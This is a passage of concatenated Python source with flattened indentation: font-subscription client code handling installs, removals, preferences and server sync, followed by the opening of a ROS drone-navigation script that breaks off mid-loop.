if problems:
return problems
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def name(self, locale=["en"]):
try:
endpointCommand = self.subscriptions()[0].protocol.endpointCommand()[1]
if endpointCommand:
return endpointCommand.name.getTextAndLocale(locale=locale)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def amountInstalledFonts(self):
try:
return len(self.installedFonts())
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def installedFonts(self):
try:
_list = []
for subscription in self.subscriptions():
for font in subscription.installedFonts():
if font not in _list:
_list.append(font)
return _list
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def amountOutdatedFonts(self):
try:
return len(self.outdatedFonts())
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def outdatedFonts(self):
try:
_list = []
for subscription in self.subscriptions():
for font in subscription.outdatedFonts():
if font not in _list:
_list.append(font)
return _list
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# def currentSubscription(self):
# if self.get('currentSubscription'):
# subscription = self.subscription(self.get('currentSubscription'))
# if subscription:
# return subscription
def get(self, key):
try:
preferences = self.parent.get("publisher(%s)" % self.canonicalURL) or {}
if key in preferences:
o = preferences[key]
if "Array" in o.__class__.__name__:
o = list(o)
elif "Dictionary" in o.__class__.__name__:
o = dict(o)
return o
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def set(self, key, value):
try:
preferences = self.parent.get("publisher(%s)" % self.canonicalURL) or {}
preferences[key] = value
self.parent.set("publisher(%s)" % self.canonicalURL, preferences)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# def addGitHubSubscription(self, url, commits):
# self.parent._subscriptions = {}
# subscription = self.subscription(url)
# subscription.set('commits', commits)
# self.set('currentSubscription', url)
# subscription.save()
# return True, None
def subscription(self, url, protocol=None):
try:
if url not in self._subscriptions:
# Load from DB
loadFromDB = False
if not protocol:
success, message = getProtocol(url)
if success:
protocol = message
loadFromDB = True
e = APISubscription(self, protocol)
if loadFromDB:
protocol.loadFromDB()
self._subscriptions[url] = e
if self.get("subscriptions") and url in self.get("subscriptions"):
self._subscriptions[url].exists = True
return self._subscriptions[url]
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def subscriptions(self):
try:
subscriptions = []
if self.get("subscriptions"):
for url in self.get("subscriptions"):
if urlIsValid(url)[0] is True:
subscriptions.append(self.subscription(url))
return subscriptions
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def update(self):
try:
self.parent.prepareUpdate()
changes = False
if self.parent.online():
for subscription in self.subscriptions():
success, message, change = subscription.update()
if change:
changes = True
if not success:
return success, message, changes
return True, None, changes
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
False,
)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def save(self):
try:
publishers = self.parent.get("publishers") or []
if self.canonicalURL not in publishers:
publishers.append(self.canonicalURL)
self.parent.set("publishers", publishers)
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def resourceByURL(self, url, binary=False, update=False):
# """Caches and returns content of a HTTP resource. If binary is set to True,
    # content will be stored and returned as a base64-encoded string"""
# try:
# success, response, mimeType = self.parent.resourceByURL(url, binary, update)
# # Save resource
# if success is True:
# resourcesList = self.get("resources") or []
# if url not in resourcesList:
# resourcesList.append(url)
# self.set("resources", resourcesList)
# return success, response, mimeType
# except Exception as e: # nocoverage
# self.parent.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
def delete(self, calledFromSubscription=False):
try:
if not calledFromSubscription:
for subscription in self.subscriptions():
success, message = subscription.delete(calledFromParent=True, remotely=False)
if not success:
return False, message
# Resources
self.parent.delegate._publisherWillDelete(self)
self.parent.remove("publisher(%s)" % self.canonicalURL)
publishers = self.parent.get("publishers")
publishers.remove(self.canonicalURL)
self.parent.set("publishers", publishers)
# self.parent.set('currentPublisher', '')
# Sync to server
if not calledFromSubscription:
self.parent.uploadSubscriptions()
self.parent.delegate._publisherHasBeenDeleted(self)
self.parent.manageMessageQueueConnection()
self.parent._publishers = {}
return True, None
except Exception as e: # nocoverage
self.parent.handleTraceback(sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e) # nocoverage
def files(self):
"Returns list of all resource URLs that the publisher may have loaded"
files = []
for subscription in self.subscriptions():
files = set(files) | set(subscription.files())
return list(set(files))
class APISubscription(object):
"""\
Represents a subscription, identified and grouped by the canonical URL attribute of
the API responses.
"""
def __init__(self, parent, protocol):
try:
self.parent = parent
self.exists = False
self.secretKey = None
self.protocol = protocol
self.protocol.subscription = self
self.protocol.client = self.parent.parent
self.url = self.protocol.unsecretURL()
self.stillAliveTouched = None
self._updatingProblem = None
# ZMQ
if self.parent.parent._isSetOnline and self.parent.parent.zmqSubscriptions:
self.parent.parent.zmqSetup()
self.parent.parent.registerZMQCallback(self.zmqTopic(), self.zmqCallback)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def zmqTopic(self):
return "subscription-%s" % urllib.parse.quote_plus(self.protocol.shortUnsecretURL())
def __repr__(self):
return f'<APISubscription url="{self.url}">'
def uniqueID(self):
try:
uniqueID = self.get("uniqueID")
if uniqueID is None or uniqueID == {}:
# import uuid
uniqueID = Garbage(10)
self.set("uniqueID", uniqueID)
return uniqueID
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def zmqCallback(self, message):
try:
if message:
data = json.loads(message)
if (
data["command"] == "pullUpdates"
and "sourceAnonymousAppID" not in data
or (
"sourceAnonymousAppID" in data
and data["sourceAnonymousAppID"] != self.parent.parent.anonymousAppID()
)
):
delegate = self.parent.parent.delegate
delegate._subscriptionUpdateNotificationHasBeenReceived(self)
success, message, changes = self.update()
if success:
if "serverTimestamp" in data and data["serverTimestamp"]:
self.set("serverTimestamp", data["serverTimestamp"])
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
# TODO: Temporarily suspended because the central API updateSubscription requires
# an APIKey parameter, so is intended only for publishers atm.
# Here, this should be called after a protected font has been installed,
# as it should update the used seats for that font
# def announceChange(self):
# try:
# if not self.parent.parent.user(): return False, 'No user'
# self.set('lastServerSync', int(time.time()))
# parameters = {
# 'command': 'updateSubscription',
# 'anonymousAppID': self.parent.parent.anonymousAppID(),
# 'anonymousUserID': self.parent.parent.user(),
# 'subscriptionURL': self.protocol.url.secretURL(),
# 'secretKey': self.parent.parent.secretKey(),
# }
# success, response, responseObject =
# self.parent.parent.performRequest(self.parent.parent.
# mothership, parameters)
# if not success:
# return False, response
# response = json.loads(response)
# if response['response'] != 'success':
# return False, ['#(response.%s)' % response['response'], '#(response.%s.
# headline)' % response['response']]
# # Success
# return True, None
# except Exception as e: self.parent.parent.handleTraceback(sourceMethod =
# getattr(self, sys._getframe().f_code.co_name), e = e)
def hasProtectedFonts(self):
try:
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            for foundry in installableFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if font.protected:
return True
return False
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def stillAlive(self):
try:
def stillAliveWorker(self):
# Register endpoint
parameters = {
"url": "typeworld://%s+%s"
% (
self.protocol.url.protocol,
self.parent.canonicalURL.replace("://", "//"),
),
}
success, response, responseObject = self.parent.parent.performRequest(
self.parent.parent.mothership + "/registerAPIEndpoint", parameters
)
if not success:
return False, response
response = json.loads(response)
# Touch only once
if not self.parent.parent.user():
if not self.stillAliveTouched:
stillAliveThread = threading.Thread(target=stillAliveWorker, args=(self,))
stillAliveThread.start()
self.stillAliveTouched = time.time()
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
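    # The stillAlive() method above registers the endpoint with the mothership
    # in a background thread, only once per session (tracked via
    # stillAliveTouched) and only while no user account is linked.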
def inviteUser(self, targetEmail):
# print("inviteUser()")
try:
if self.parent.parent.online():
if not self.parent.parent.userEmail():
return False, "No source user linked."
parameters = {
"targetUserEmail": targetEmail,
"sourceUserEmail": self.parent.parent.userEmail(),
"subscriptionURL": self.protocol.secretURL(),
}
success, response, responseObject = self.parent.parent.performRequest(
self.parent.parent.mothership + "/inviteUserToSubscription",
parameters,
)
if not success:
return False, response
response = json.loads(response)
# print(response)
if response["response"] == "success":
return True, None
else:
return (
False,
[
"#(response.%s)" % response["response"],
"#(response.%s.headline)" % response["response"],
],
)
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def revokeUser(self, targetEmail):
try:
if self.parent.parent.online():
parameters = {
"targetUserEmail": targetEmail,
"sourceUserEmail": self.parent.parent.userEmail(),
"subscriptionURL": self.protocol.secretURL(),
}
success, response, responseObject = self.parent.parent.performRequest(
self.parent.parent.mothership + "/revokeSubscriptionInvitation",
parameters,
)
if not success:
return False, response
response = json.loads(response)
if response["response"] == "success":
return True, None
else:
return False, response["response"]
else:
return (
False,
["#(response.notOnline)", "#(response.notOnline.headline)"],
)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def invitationAccepted(self):
try:
if self.parent.parent.user():
acceptedInvitations = self.parent.parent.acceptedInvitations()
if acceptedInvitations:
for invitation in acceptedInvitations:
if self.protocol.unsecretURL() == invitation.url:
return True
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def invitationSent(self):
try:
if self.parent.parent.user():
sentInvitations = self.parent.parent.sentInvitations()
if sentInvitations:
for invitation in sentInvitations:
if self.protocol.unsecretURL() == invitation.url:
return True
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def stillUpdating(self):
try:
return self.url in self.parent._updatingSubscriptions
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def name(self, locale=["en"]):
try:
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            return installableFontsCommand.name.getText(locale) or "#(Unnamed)"
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
# # DEPRECATED, since resources are now handled by GUI since 0.2.10-beta
# def resourceByURL(self, url, binary=False, update=False):
# """Caches and returns content of a HTTP resource. If binary is set to True,
    # content will be stored and returned as a base64-encoded string"""
# try:
# success, response, mimeType = self.parent.parent.resourceByURL(
# url, binary, update
# )
# # Save resource
# if success is True:
# resourcesList = self.get("resources") or []
# if url not in resourcesList:
# resourcesList.append(url)
# self.set("resources", resourcesList)
# return success, response, mimeType
# except Exception as e: # nocoverage
# self.parent.parent.handleTraceback( # nocoverage
# sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
# )
def familyByID(self, ID):
try:
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            for foundry in installableFontsCommand.foundries:
for family in foundry.families:
if family.uniqueID == ID:
return family
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def fontByID(self, ID):
try:
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            for foundry in installableFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if font.uniqueID == ID:
return font
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def amountInstalledFonts(self):
try:
return len(self.installedFonts())
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def installedFonts(self):
try:
_list = []
# Get font
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            for foundry in installableFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if self.installedFontVersion(font=font):
if font not in _list:
_list.append(font)
return _list
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def expiringInstalledFonts(self):
try:
fonts = []
# Get font
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            for foundry in installableFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
if self.installedFontVersion(font=font) and font.expiry:
if font not in fonts:
fonts.append(font)
return fonts
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def amountOutdatedFonts(self):
try:
return len(self.outdatedFonts())
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def outdatedFonts(self):
try:
_list = []
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            # Collect the unique IDs of fonts whose installed version differs
            # from the latest published version
            for foundry in installableFontsCommand.foundries:
                for family in foundry.families:
                    for font in family.fonts:
                        installedFontVersion = self.installedFontVersion(font=font)
                        if installedFontVersion and installedFontVersion != font.getVersions()[-1].number:
                            if font.uniqueID not in _list:
                                _list.append(font.uniqueID)
return _list
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def installedFontVersion(self, fontID=None, font=None):
try:
folder = self.parent.folder()
if fontID and not font:
font = self.fontByID(fontID)
for version in font.getVersions():
path = os.path.join(folder, self.uniqueID() + "-" + font.filename(version.number))
if os.path.exists(path):
return version.number
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
# def fontIsOutdated(self, fontID):
# success, installabeFontsCommand = self.protocol.installableFontsCommand()
# for foundry in installabeFontsCommand.foundries:
# for family in foundry.families:
# for font in family.fonts:
# if font.uniqueID == fontID:
# installedVersion = self.installedFontVersion(fontID)
# return installedVersion and installedVersion != font.getVersions()[-1].number
def removeFonts(self, fontIDs, dryRun=False, updateSubscription=True):
try:
success, installableFontsCommand = self.protocol.installableFontsCommand()
uninstallTheseProtectedFontIDs = []
uninstallTheseUnprotectedFontIDs = []
folder = self.parent.folder()
for fontID in fontIDs:
path = None
font = self.fontByID(fontID)
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion:
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(installedFontVersion),
)
if not path and not dryRun:
return False, "Font path couldn’t be determined (preflight)"
if font.protected:
self.parent.parent.delegate._fontWillUninstall(font)
# Test for permissions here
if not dryRun:
try:
if self.parent.parent.testScenario == "simulatePermissionError":
raise PermissionError
else:
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
f = open(path + ".test", "w")
f.write("test")
f.close()
os.remove(path + ".test")
except PermissionError:
self.parent.parent.delegate._fontHasInstalled(
False,
"Insufficient permission to uninstall font.",
font,
)
return False, "Insufficient permission to uninstall font."
assert os.path.exists(path + ".test") is False
uninstallTheseProtectedFontIDs.append(fontID)
else:
uninstallTheseUnprotectedFontIDs.append(fontID)
assert self.parent.parent == self.protocol.client
assert self.parent.parent.testScenario == self.protocol.client.testScenario
# Server access
# Protected fonts
if uninstallTheseProtectedFontIDs:
success, payload = self.protocol.removeFonts(
uninstallTheseProtectedFontIDs,
updateSubscription=updateSubscription,
)
font = None
if success:
# # Security check
# if set([x.uniqueID for x in payload.assets]) - set(fontIDs) or
# set(fontIDs) - set([x.uniqueID for x in payload.assets]):
# return False, 'Incoming fonts’ uniqueIDs mismatch with requested
# font IDs.'
if len(payload.assets) == 0:
return (
False,
f"No fonts to uninstall in .assets, expected {len(uninstallTheseProtectedFontIDs)} assets",
)
# Process fonts
for incomingFont in payload.assets:
if incomingFont.uniqueID in fontIDs:
proceed = ["unknownInstallation", "unknownFont"] #
if incomingFont.response in proceed:
pass
# Predefined response messages
elif incomingFont.response != "error" and incomingFont.response != "success":
return (
False,
[
"#(response.%s)" % incomingFont.response,
"#(response.%s.headline)" % incomingFont.response,
],
)
elif incomingFont.response == "error":
return False, incomingFont.errorMessage
if incomingFont.response == "success":
path = None
font = self.fontByID(incomingFont.uniqueID)
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion:
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(installedFontVersion),
)
if self.parent.parent.testScenario == "simulateNoPath":
path = None
if not path and not dryRun:
return (
False,
"Font path couldn’t be determined (deleting unprotected fonts)",
)
if not dryRun:
os.remove(path)
self.parent.parent.delegate._fontHasUninstalled(True, None, font)
else:
self.parent.parent.delegate._fontHasUninstalled(False, payload, font)
return False, payload
# Unprotected fonts
if uninstallTheseUnprotectedFontIDs:
for fontID in uninstallTheseUnprotectedFontIDs:
path = None
font = self.fontByID(fontID)
installedFontVersion = self.installedFontVersion(font=font)
if installedFontVersion:
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(installedFontVersion),
)
if self.parent.parent.testScenario == "simulateNoPath":
path = None
if not path and not dryRun:
return (
False,
"Font path couldn’t be determined (deleting unprotected fonts)",
)
if not dryRun:
os.remove(path)
self.parent.parent.delegate._fontHasUninstalled(True, None, font)
return True, None
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def installFonts(self, fonts):
try:
# Terms of Service
if self.get("acceptedTermsOfService") is not True:
return (
False,
[
"#(response.termsOfServiceNotAccepted)",
"#(response.termsOfServiceNotAccepted.headline)",
],
)
            success, installableFontsCommand = self.protocol.installableFontsCommand()
installTheseFontIDs = []
protectedFonts = False
versionByFont = {}
folder = self.parent.folder()
fontIDs = []
for fontID, version in fonts:
fontIDs.append(fontID)
versionByFont[fontID] = version
path = None
font = self.fontByID(fontID)
path = os.path.join(folder, self.uniqueID() + "-" + font.filename(version))
if font.protected or font.expiry or font.expiryDuration:
protectedFonts = True
assert path
assert font
self.parent.parent.delegate._fontWillInstall(font)
# Test for permissions here
try:
if self.parent.parent.testScenario == "simulatePermissionError":
raise PermissionError
else:
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
f = open(path + ".test", "w")
f.write("test")
f.close()
os.remove(path + ".test")
except PermissionError:
self.parent.parent.delegate._fontHasInstalled(
False, "Insufficient permission to install font.", font
)
return False, "Insufficient permission to install font."
assert os.path.exists(path + ".test") is False
installTheseFontIDs.append(fontID)
# Server access
success, payload = self.protocol.installFonts(fonts, updateSubscription=protectedFonts)
font = None
if success:
# Check for empty assets
if len(payload.assets) == 0:
return (
False,
f"No fonts to install in .assets, expected {len(installTheseFontIDs)} assets",
)
# Check if all requested fonts and fontVersions
# are present in the assets
for fontID, version in fonts:
if not [fontID, version] in [[x.uniqueID, x.version] for x in payload.assets]:
return (
False,
f"Font {fontID} with version {version} not found in assets",
)
# Process fonts
for incomingFont in payload.assets:
if incomingFont.uniqueID in fontIDs:
if incomingFont.response == "error":
return False, incomingFont.errorMessage
# Predefined response messages
elif incomingFont.response != "error" and incomingFont.response != "success":
return (
False,
[
"#(response.%s)" % incomingFont.response,
"#(response.%s.headline)" % incomingFont.response,
],
)
if incomingFont.response == "success":
path = None
font = self.fontByID(incomingFont.uniqueID)
path = os.path.join(
folder,
self.uniqueID() + "-" + font.filename(versionByFont[incomingFont.uniqueID]),
)
assert path
if not os.path.exists(os.path.dirname(path)):
os.makedirs(os.path.dirname(path))
if incomingFont.data and incomingFont.encoding:
f = open(path, "wb")
f.write(base64.b64decode(incomingFont.data))
f.close()
elif incomingFont.dataURL:
(
success,
response,
responseObject,
) = self.parent.parent.performRequest(incomingFont.dataURL, method="GET")
if not success:
return False, response
else:
f = open(path, "wb")
f.write(response)
f.close()
self.parent.parent.delegate._fontHasInstalled(True, None, font)
# Ping
self.stillAlive()
return True, None
else:
self.parent.parent.delegate._fontHasInstalled(False, payload, font)
return False, payload
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
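    # Minimal usage sketch (illustrative; the ID and version values are
    # placeholders): installFonts() expects (fontID, version) pairs and returns
    # (success, message).
    #
    #     success, message = subscription.installFonts([("<fontID>", "1.0")])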
def update(self):
try:
self.parent._updatingSubscriptions.append(self.url)
if self.parent.parent.online(self.protocol.url.restDomain.split("/")[0]):
self.parent.parent.delegate._subscriptionWillUpdate(self)
self.stillAlive()
success, message, changes = self.protocol.update()
if self.url in self.parent._updatingSubscriptions:
self.parent._updatingSubscriptions.remove(self.url)
self._updatingProblem = None
self.parent.parent._subscriptionsUpdated.append(self.url)
if not success:
self.parent.parent.delegate._subscriptionHasBeenUpdated(self, success, message, changes)
return success, message, changes
if changes:
self.save()
# Success
self.parent.parent.delegate._subscriptionHasBeenUpdated(self, True, None, changes)
return True, None, changes
else:
self.parent._updatingSubscriptions.remove(self.url)
self.parent.parent._subscriptionsUpdated.append(self.url)
self._updatingProblem = [
"#(response.serverNotReachable)",
"#(response.serverNotReachable.headline)",
]
self.parent.parent.delegate._subscriptionHasBeenUpdated(self, False, self._updatingProblem, False)
return False, self._updatingProblem, False
except Exception as e: # nocoverage
success, message = self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
return False, message, False
def updatingProblem(self):
try:
return self._updatingProblem
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def get(self, key):
try:
preferences = dict(self.parent.parent.get("subscription(%s)" % self.protocol.unsecretURL()) or {})
if key in preferences:
o = preferences[key]
if "Array" in o.__class__.__name__:
o = list(o)
elif "Dictionary" in o.__class__.__name__:
o = dict(o)
return o
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def set(self, key, value):
try:
preferences = dict(self.parent.parent.get("subscription(%s)" % self.protocol.unsecretURL()) or {})
preferences[key] = value
self.parent.parent.set("subscription(%s)" % self.protocol.unsecretURL(), preferences)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def remove(self, key):
try:
preferences = dict(self.parent.parent.get("subscription(%s)" % self.protocol.unsecretURL()) or {})
if key in preferences:
del preferences[key]
self.parent.parent.set("subscription(%s)" % self.protocol.unsecretURL(), preferences)
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def save(self):
try:
subscriptions = self.parent.get("subscriptions") or []
if not self.protocol.unsecretURL() in subscriptions:
subscriptions.append(self.protocol.unsecretURL())
self.parent.set("subscriptions", subscriptions)
self.protocol.save()
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def delete(self, calledFromParent=False, remotely=False):
try:
            success, installableFontsCommand = self.protocol.installableFontsCommand()
            # Delete all fonts
            for foundry in installableFontsCommand.foundries:
for family in foundry.families:
for font in family.fonts:
self.removeFonts([font.uniqueID])
# Key
try:
self.protocol.deleteSecretKey()
except Exception:
pass
# ZMQ
self.parent.parent.unregisterZMQCallback(self.zmqTopic())
# Resources
self.parent.parent.delegate._subscriptionWillDelete(self)
self.parent.parent.remove("subscription(%s)" % self.protocol.unsecretURL())
# Subscriptions
subscriptions = self.parent.get("subscriptions") or []
subscriptions.remove(self.protocol.unsecretURL())
self.parent.set("subscriptions", subscriptions)
self.parent._subscriptions = {}
# # currentSubscription
# if self.parent.get('currentSubscription') == self.protocol.unsecretURL():
# if len(subscriptions) >= 1:
# self.parent.set('currentSubscription', subscriptions[0])
self.parent._subscriptions = {}
if len(subscriptions) == 0 and calledFromParent is False:
self.parent.delete(calledFromSubscription=True)
self.parent.parent.delegate._subscriptionHasBeenDeleted(
self, withinPublisherDeletion=calledFromParent, remotely=remotely
)
self.parent.parent.manageMessageQueueConnection()
if not remotely and not calledFromParent:
self.parent.parent.uploadSubscriptions()
return True, None
except Exception as e: # nocoverage
self.parent.parent.handleTraceback( # nocoverage
sourceMethod=getattr(self, sys._getframe().f_code.co_name), e=e
)
def files(self):
"Returns list of all resource URLs that the subscription may have loaded"
files = []
# Endpoint
success, endpointCommand = self.protocol.endpointCommand()
if success:
if endpointCommand.logoURL:
files.append(endpointCommand.logoURL)
# Installable Fonts
success, installableFontsCommand = self.protocol.installableFontsCommand()
if success:
for foundry in installableFontsCommand.foundries:
# styling
for theme in foundry.styling:
if "logoURL" in foundry.styling[theme]:
files.append(foundry.styling[theme]["logoURL"])
for family in foundry.families:
for url in family.billboardURLs:
files.append(url)
for font in family.fonts:
for url in font.billboardURLs:
files.append(url)
return list(set(files))
|
Navigator_rs_tx2.py
|
#encoding=utf-8
'''
Project overview:
Subscribe:
    1. SLAM pose (global/local pose) *
    2. octomap_server / global map
    3. local point cloud / local octomap
    4. target input (semantic target / visual pose target / GPS target)
Publish:
    1. Mavros (amo) command
    2. Navigator status
Algorithms:
    1. D*
    2. state transfer
    3. position-to-position PID controller
    4. global/semantic/visual target to local pose
'''
import threading
import time
from path_optimization.path_pruning import PathPruning
# for ros
import rospy
from geometry_msgs.msg import PoseStamped, Twist
from std_msgs.msg import Float32, String
from sensor_msgs.msg import Imu, NavSatFix, PointCloud, PointCloud2
import sensor_msgs.point_cloud2 as pc2
from visualization_msgs.msg import Marker,MarkerArray
# for mavros
from mavros_msgs.msg import GlobalPositionTarget, State, PositionTarget#, Command
from mavros_msgs.srv import CommandBool, SetMode
# for octomap
from octomap_msgs.msg import Octomap, OctomapWithPose, octomap_msgs
from helper import save_points3D, load_points3D
# other useful utilities
#from pyquaternion import Quaternion
import pyquaternion
import astar.astar
import astar.driver
import math
from enum import Enum
#from queue import Queue
#from Pos2PosController import Pos2PosController as Controller # TODO:re-implement this.
from SimController import Controller as Controller
import DiscreteGridUtils
import numpy as np
from RandomSampling.randomsampling import randomsampling
# define system status
class status(Enum):
INITIALIZED = 1
LOOKING_FOR_PATH = 2
LOOKING_FOR_PATH_SUCCEED = 3
LOOKING_FOR_PATH_FAILED = 4
GOING_TO_TARGET = 5
GOING_TO_VISION_TARGET = 6
class Navigator:
def __init__(self, save_pts=False, config_file_path=None):
if config_file_path:
pass
rospy.init_node("gi_navigator_node")
self.dg = DiscreteGridUtils.DiscreteGridUtils(grid_size=0.1) # modify grid size according to different purposes
self.rate = rospy.Rate(50)
self.driver = astar.driver.Driver()
self.controller = Controller()
self.mavros_state = "OFFBOARD"
self.set_status(status.INITIALIZED)
self.save_pts = save_pts
self.cur_command_id = 0
self.prev_command_id = 0
self.cur_target_position = None
self.task_id = -1
self.obstacle_set_mutex = threading.Lock() # mutex.acquire(timeout);mutex.release()
self.nav_command_mutex = threading.Lock() # for nav command in dstar and ros high level command.
self.local_pose_d = None
self.local_pose_c = None
self.navigator_status_pub = rospy.Publisher('/gi/navigator_status', String, queue_size=10)
self.path_plan_pub = rospy.Publisher('/gi/navi_path_plan', MarkerArray, queue_size=10)
self.path = []
self.path_prune = PathPruning(obstacle_distance=12)
self.rs = randomsampling()
t1 = threading.Thread(target=self.ros_thread)
t1.start()
'''
+Z +Z ^ +Y
^ ^ /
| | /
| |/
+X <------0 convert to 0------> +X
/
/
/
+Y
(PX4 frame) (Gazebo frame)
'''
def path_in_gazebo_frame_to_enu_frame(self, gazebo_path):
enu_frame_path = []
for gazebo_path_point in gazebo_path:
enu_frame_path_point = [0, 0, 0]
enu_frame_path_point[0] = - gazebo_path_point[0]
enu_frame_path_point[1] = - gazebo_path_point[1]
enu_frame_path_point[2] = gazebo_path_point[2]
enu_frame_path.append(enu_frame_path_point)
return enu_frame_path
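    # Example (for illustration): under this 180-degree rotation about +Z, the
    # Gazebo-frame point [1.0, 2.0, 0.5] maps to the ENU-frame point
    # [-1.0, -2.0, 0.5]; the z coordinate is unchanged.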
'''
Navigating thread
'''
def keep_navigating(self):
while self.mavros_state == "OFFBOARD" and not (rospy.is_shutdown()):
# get target position and local position in discrete
current_pos = self.get_local_pose_d()
end_pos = self.get_latest_target()
if current_pos is None:
print('current pose not valid!')
time.sleep(0.5)
continue
while not self.reachTargetPositionDiscrete(end_pos, 4) \
and (not self.navi_task_terminated()) \
and (not rospy.is_shutdown()): # Till task is finished:
print('From ', self.get_local_pose_d())
